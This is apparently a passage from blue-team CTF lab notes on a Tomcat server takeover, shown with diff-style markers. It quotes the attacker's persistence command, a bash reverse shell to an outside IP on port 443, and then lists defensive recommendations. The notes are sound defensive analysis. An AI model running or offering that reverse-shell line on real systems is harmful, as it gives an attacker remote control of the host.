Jacob-Brown-950/Blue-Team-CTFs/Tomcat Takeover Lab/Lab_notes.md

 ### 7. Persistence Command
 - **Scheduled Command**: `/bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'`
   - This command was used to establish a reverse shell and maintain persistence on the compromised system.

-## Recommendations

-1. **Immediate Action**: Isolate the compromised web server (10.0.0.112) from the network to prevent further damage or data exfiltration.
-2. **Credential Review**: Ensure all default credentials are updated across all servers and services, especially those accessible via the internet.
-3. **Firewall Policies**: Restrict access to sensitive ports such as **8080** and **22** to trusted IPs only.
-4. **File Integrity Monitoring**: Set up monitoring on critical directories such as `/manager` to detect unauthorized uploads or changes in real-time.
-5. **Incident Response**: Conduct a comprehensive review of server logs and deploy endpoint detection and response (EDR) tools to identify any further compromise or lateral movement by the attacker.

----

-This analysis highlights the importance of securing administrative interfaces and regularly auditing server configurations to prevent similar incidents in the future.
-Stay vigilant and ensure your systems are hardened against common attack vectors.